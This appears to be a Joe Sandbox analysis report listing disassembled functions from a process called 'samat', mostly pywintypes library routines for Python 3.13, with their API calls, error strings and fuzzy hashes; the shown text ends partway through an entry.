Function 00007FF8B7E82C70 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 133COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E82CF6

Strings

The object is not a PySID object, xrefs: 00007FF8B7E82CEC
%s: unable to allocated %d bytes, xrefs: 00007FF8B7E82DC2
%s not supported by this version of Windows, xrefs: 00007FF8B7E82C99
%s: adding ACE would put ACL over size limit, xrefs: 00007FF8B7E82D90

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String
String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
API String ID: 1450464846-1709335586
Opcode ID: a1e77c7967686f55aa96d559abd8a6b890d2a3f689a11bfbc787306795e293e7
Instruction ID: 0b81a1e81528fdba771eaec19ba8b104d301faf84ce92caa0e31f370ff635edb
Opcode Fuzzy Hash: a1e77c7967686f55aa96d559abd8a6b890d2a3f689a11bfbc787306795e293e7
Instruction Fuzzy Hash: FD512F26B0CB4282FB549B5AA85013E63A4BF85FC4F944035EF4E47BB6DE3CE5458704

Function 00007FF8B7E82920 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E829A0

Strings

The object is not a PySID object, xrefs: 00007FF8B7E82996
%s: unable to allocated %d bytes, xrefs: 00007FF8B7E82A5B
%s not supported by this version of Windows, xrefs: 00007FF8B7E8294E
%s: adding ACE would put ACL over size limit, xrefs: 00007FF8B7E82A29

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String
String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
API String ID: 1450464846-1709335586
Opcode ID: acd72d126dd04e3d366b3d57bba94e5d2814d11e261c2ab172a574c504a94f1b
Instruction ID: b47f78c728c2ae03d3f1457e96e095ad1f90fab56e178f26dd031e3e601e72be
Opcode Fuzzy Hash: acd72d126dd04e3d366b3d57bba94e5d2814d11e261c2ab172a574c504a94f1b
Instruction Fuzzy Hash: DE516E26B0CB4282FA149B9EA85003D63A5BF89FD4F944435EF4E47BB6EE3CE5458300

Function 00007FF8B7E87950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsValidSecurityDescriptor.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87960
PyErr_SetString.PYTHON313(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8797B
GetSecurityDescriptorLength.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87996
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E879A4
MakeSelfRelativeSD.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E879BD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E879CE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E879DE
PyErr_Format.PYTHON313(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87A02

Strings

MakeSelfRelativeSD, xrefs: 00007FF8B7E87A41
Invalid Security descriptor, xrefs: 00007FF8B7E87971
Unable to allocate %d bytes, xrefs: 00007FF8B7E879F3

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorErr_Securitymalloc$FormatLengthMakeRelativeSelfStringValidfree
String ID: Invalid Security descriptor$MakeSelfRelativeSD$Unable to allocate %d bytes
API String ID: 1101611553-2210018374
Opcode ID: ac73de6e39ddeed083d98a8888cc15b10e7ce052d5d07b96d89372fbc4ae9b04
Instruction ID: 0b1f43895be5e68762b5146c48bdb006752766505c2daf885cc998033ad57b80
Opcode Fuzzy Hash: ac73de6e39ddeed083d98a8888cc15b10e7ce052d5d07b96d89372fbc4ae9b04
Instruction Fuzzy Hash: 5B31FB22B18B4182EB809BA9F85426D63A1FF89FC4F445131EB4E87769DF3DD8858700

Function 00007FF8B7E81BE0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E81C4E
PyErr_Format.PYTHON313 ref: 00007FF8B7E81C70

Strings

ReorderACL, xrefs: 00007FF8B7E81DBB
Ace type %d is not supported yet, xrefs: 00007FF8B7E81DA4
Error reordering ACL: Unable to allocate acl of size %d, xrefs: 00007FF8B7E81C63

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_Formatmalloc
String ID: Ace type %d is not supported yet$Error reordering ACL: Unable to allocate acl of size %d$ReorderACL
API String ID: 1659041409-545600788
Opcode ID: 80076816f9a1870518144f9e70f1a9ffdbb8e573a704e52155d4e8cf1921dfc3
Instruction ID: d4337464b2e1e61a088f659f8995c6541445e442b19290d97dd67759186d4330
Opcode Fuzzy Hash: 80076816f9a1870518144f9e70f1a9ffdbb8e573a704e52155d4e8cf1921dfc3
Instruction Fuzzy Hash: 38516F62A0879281F7608F6AA44037EA7A0FF85FC5F945039EF8D837A5DE3CE4458740

Function 00007FF8B7E86BF0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 113COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E86C1E
PyUnicode_AsUTF8.PYTHON313 ref: 00007FF8B7E86C3F
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E86CE3

Strings

can't delete OVERLAPPED attributes, xrefs: 00007FF8B7E86C14
The object is not a PyHANDLE object, xrefs: 00007FF8B7E86CAF
Internal, xrefs: 00007FF8B7E86D20
hEvent, xrefs: 00007FF8B7E86C53
InternalHigh, xrefs: 00007FF8B7E86D4F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DeallocErr_StringUnicode_
String ID: Internal$InternalHigh$The object is not a PyHANDLE object$can't delete OVERLAPPED attributes$hEvent
API String ID: 3427960318-2811562281
Opcode ID: 6f9bae75d1a21e5200ff923e5a1191e3a43b0791db843c6bce82305bf55956a3
Instruction ID: e63160ecd059982688483c53fc5323dab0ac780a98759d696d86bd6b8ba5e31c
Opcode Fuzzy Hash: 6f9bae75d1a21e5200ff923e5a1191e3a43b0791db843c6bce82305bf55956a3
Instruction Fuzzy Hash: C5510962A08B4292FA649B6EE94027D63A0FF45FC4F944131DB4E477B6DF3DE5558300

Function 00007FF8B7E8AD90 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E8ADCF
PyUnicode_AsMBCSString.PYTHON313 ref: 00007FF8B7E8AE01
PyErr_Format.PYTHON313 ref: 00007FF8B7E8AE38

Strings

value is larger than a DWORD, xrefs: 00007FF8B7E8AE73
Expected 'bytes', got '%s', xrefs: 00007FF8B7E8AE2A
None is not a valid string in this context, xrefs: 00007FF8B7E8ADC5

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String$FormatUnicode_
String ID: Expected 'bytes', got '%s'$None is not a valid string in this context$value is larger than a DWORD
API String ID: 744494611-3495899980
Opcode ID: 642d062dd71c2c3f8c7481d2541cfedb3f89497689dab01917ab17cc1366d4e1
Instruction ID: 56305ebd00af590c72a229b8a0351df8459c51c62a1ba7e9a3853627f48a5ccb
Opcode Fuzzy Hash: 642d062dd71c2c3f8c7481d2541cfedb3f89497689dab01917ab17cc1366d4e1
Instruction Fuzzy Hash: F7411A22A0DB4285EB518F5EE84427D63A0AF48FC4F594532EB0E87776EE3DE495C300

Function 00007FF8B7E8B040 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E8B080
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8B0B3
PyMem_Free.PYTHON313 ref: 00007FF8B7E8B0C3
SysAllocStringLen.OLEAUT32 ref: 00007FF8B7E8B0DD
PyMem_Free.PYTHON313 ref: 00007FF8B7E8B0F0
SysStringLen.OLEAUT32 ref: 00007FF8B7E8B114
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8B13F
PyErr_Format.PYTHON313 ref: 00007FF8B7E8B16A

Strings

<NULL!!>, xrefs: 00007FF8B7E8B152
value is larger than a DWORD, xrefs: 00007FF8B7E8B0A9
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E8B160
None is not a valid string in this context, xrefs: 00007FF8B7E8B135

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: String$Err_$FreeMem_$AllocCharFormatUnicode_Wide
String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
API String ID: 2830890580-4125661472
Opcode ID: 2f2fd1bd077cf4d9f48c6f4d287ef1593a6289a2c9030374ace75b4ff9283679
Instruction ID: 0902fab67f90cef7121c8d5c2e5de6e52658d1832a9ae3dff4232361c3604e44
Opcode Fuzzy Hash: 2f2fd1bd077cf4d9f48c6f4d287ef1593a6289a2c9030374ace75b4ff9283679
Instruction Fuzzy Hash: 3031D626A08B42C2FB508B9AE44026D63A1FF88FD4F884531EB5E87779DF7CE4498701

Function 00007FF8B7E8CEB0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
_Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B
_Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF71

Strings

Unable to convert %s to pointer-sized value, xrefs: 00007FF8B7E8CF36

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_Long$Occurred$DeallocLong_$ClearFormatNumber_Unsigned
String ID: Unable to convert %s to pointer-sized value
API String ID: 1465853305-2431006615
Opcode ID: 57e26dbec32f2f369f39d670887e51803981aee692bf8c45d946dd112ecbf49d
Instruction ID: 033caa45e474f44c5f8329c47735899dd1ebe8fb55385c69065f2793b12e4a1a
Opcode Fuzzy Hash: 57e26dbec32f2f369f39d670887e51803981aee692bf8c45d946dd112ecbf49d
Instruction Fuzzy Hash: 66211932E09B4291FB544FA9E85463C23A0AF4AFE5F485275EB2E423F5DE3CE4958300

Function 00007FF8B7E8C110 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 38threadmemoryCOMMON

Download Yara Rule

APIs

PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8C120
_Py_FatalErrorFunc.PYTHON313 ref: 00007FF8B7E8C13C
PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8C14E
LocalAlloc.KERNEL32 ref: 00007FF8B7E8C161
_Py_FatalErrorFunc.PYTHON313 ref: 00007FF8B7E8C17D
TlsSetValue.KERNEL32 ref: 00007FF8B7E8C18D
PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8C195
PyThreadState_Swap.PYTHON313 ref: 00007FF8B7E8C1A1

Strings

Out of memory allocating thread state., xrefs: 00007FF8B7E8C16F
PyWinInterpreterState_Ensure, xrefs: 00007FF8B7E8C135, 00007FF8B7E8C176
pywintypes: can not setup interpreter state, as current state is invalid, xrefs: 00007FF8B7E8C12E

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: State_SwapThread$ErrorFatalFunc$AllocLocalValue
String ID: Out of memory allocating thread state.$PyWinInterpreterState_Ensure$pywintypes: can not setup interpreter state, as current state is invalid
API String ID: 4234957216-1490924957
Opcode ID: ea76954ba2b931e15fda9edfbedd9c8b0e85c06434b3c3fd715313b2e18efd7a
Instruction ID: d95e77a5ed6b6bf4c2aa5702d5d8552182f098e4018353089b971ee4e6dba31b
Opcode Fuzzy Hash: ea76954ba2b931e15fda9edfbedd9c8b0e85c06434b3c3fd715313b2e18efd7a
Instruction Fuzzy Hash: 22119236A09B07A6EB589B59E89826D33A0FF48FD5F840439D60E433B4EF3CE5588200

Function 00007FF7E12C2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7E12C21AB
SelectObject.GDI32 ref: 00007FF7E12C21F2
DrawTextW.USER32 ref: 00007FF7E12C2215
SelectObject.GDI32 ref: 00007FF7E12C222B
ReleaseDC.USER32 ref: 00007FF7E12C223B
MoveWindow.USER32 ref: 00007FF7E12C228B
MoveWindow.USER32 ref: 00007FF7E12C22CB
MoveWindow.USER32 ref: 00007FF7E12C231E
MoveWindow.USER32 ref: 00007FF7E12C2366

Strings

P%, xrefs: 00007FF7E12C21FF

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: ebf4d3a0c32c6121c8b71d1092ddf96f1ad691fb6c2c108c588ef25df26c52e0
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: AD5107266047A186D7259F26E8182BAF7A1F798B61F004122EBDE83694DF7CD045CB20

Function 00007FF8B7E8CA90 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 89timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32 ref: 00007FF8B7E8CACD
FileTimeToSystemTime.KERNEL32 ref: 00007FF8B7E8CAFF
FileTimeToSystemTime.KERNEL32 ref: 00007FF8B7E8CB32
PyLong_FromUnsignedLong.PYTHON313 ref: 00007FF8B7E8CB6B
PyLong_FromUnsignedLong.PYTHON313 ref: 00007FF8B7E8CB78
PyLong_FromUnsignedLong.PYTHON313 ref: 00007FF8B7E8CB85
PyLong_FromUnsignedLong.PYTHON313 ref: 00007FF8B7E8CB92
Py_BuildValue.PYTHON313 ref: 00007FF8B7E8CBD0

Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA

Part of subcall function 00007FF8B7E8A400: PyObject_GetAttrString.PYTHON313(?,?,?,?,?,?,?,?,?,00007FF8B7E89C6D), ref: 00007FF8B7E8A444
Part of subcall function 00007FF8B7E8A400: _Py_Dealloc.PYTHON313(?,?,?,?,?,?,?,?,?,00007FF8B7E89C6D), ref: 00007FF8B7E8A4A8

Strings

FileTimeToSystemTime, xrefs: 00007FF8B7E8CAD9, 00007FF8B7E8CB0B, 00007FF8B7E8CB3E
lNNNNNNNuu, xrefs: 00007FF8B7E8CB9B

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Time$FromLongLong_Unsigned$FileSystem$BuildValue$AttrDeallocDecodeErr_ErrorFormatFreeLastLocalMessageObjectObject_StringUnicode_
String ID: FileTimeToSystemTime$lNNNNNNNuu
API String ID: 3509019891-4021486075
Opcode ID: e012cac86467e09425fc3eb86c788589e93cbae2027880d1750f8e61441089dd
Instruction ID: 2b687677daba3507572f0b81dd81fd96e0f17765469ca5f01d263186396917f7
Opcode Fuzzy Hash: e012cac86467e09425fc3eb86c788589e93cbae2027880d1750f8e61441089dd
Instruction Fuzzy Hash: 33411826A08B4192E650DB59F8446AE73A4FF89BC4F854132EA8D437B6DF3CE446C700

Function 00007FF8B7E8B1A0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 74COMMON

Download Yara Rule

APIs

PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E8B1DA
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8B1F9
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8B24D
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8B27F

Strings

<NULL!!>, xrefs: 00007FF8B7E8B292
value is larger than a DWORD, xrefs: 00007FF8B7E8B243
Getting WCHAR string, xrefs: 00007FF8B7E8B1EF
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E8B2A0
None is not a valid string in this context, xrefs: 00007FF8B7E8B275

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: String$Err_$CharUnicode_Wide
String ID: <NULL!!>$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
API String ID: 3849944921-1275048830
Opcode ID: b0e8982cd879d59a9668f92adfe5365474881f42431a1bc4517e5c5527a76195
Instruction ID: 3afebe0c4db59599bcba6ae4648355924b2d8b4576130c93f88d694e3b355931
Opcode Fuzzy Hash: b0e8982cd879d59a9668f92adfe5365474881f42431a1bc4517e5c5527a76195
Instruction Fuzzy Hash: 1331E922A18B8281EB508B9EE48016D63B0FF89FC4F945532EB4D87775DE3CD4458700

Function 00007FF7E12C80C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7E12C80FF
GetWindowLongPtrW.USER32 ref: 00007FF7E12C817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF7E12C8192
GetLastError.KERNEL32 ref: 00007FF7E12C819C
SetWindowLongPtrW.USER32 ref: 00007FF7E12C81B3

Strings

Needs to remove its temporary files., xrefs: 00007FF7E12C8185

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: b530895f767a068d39fbb523c3f6f018e60985dda97c1510cd40a1c70da1ae6b
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: AE21AD21B0864381E7426B79EC563799294FF85B90F898133DF1D833D4DEBCD5808222

Function 00007FF8B7E8C030 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

PyObject_GetAttrString.PYTHON313 ref: 00007FF8B7E8C04C
PyErr_Clear.PYTHON313 ref: 00007FF8B7E8C05A
PyCallable_Check.PYTHON313 ref: 00007FF8B7E8C06E
PyObject_CallObject.PYTHON313 ref: 00007FF8B7E8C07D
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8C094
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8C0CF
PyErr_Clear.PYTHON313 ref: 00007FF8B7E8C0D9
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8C0F0

Strings

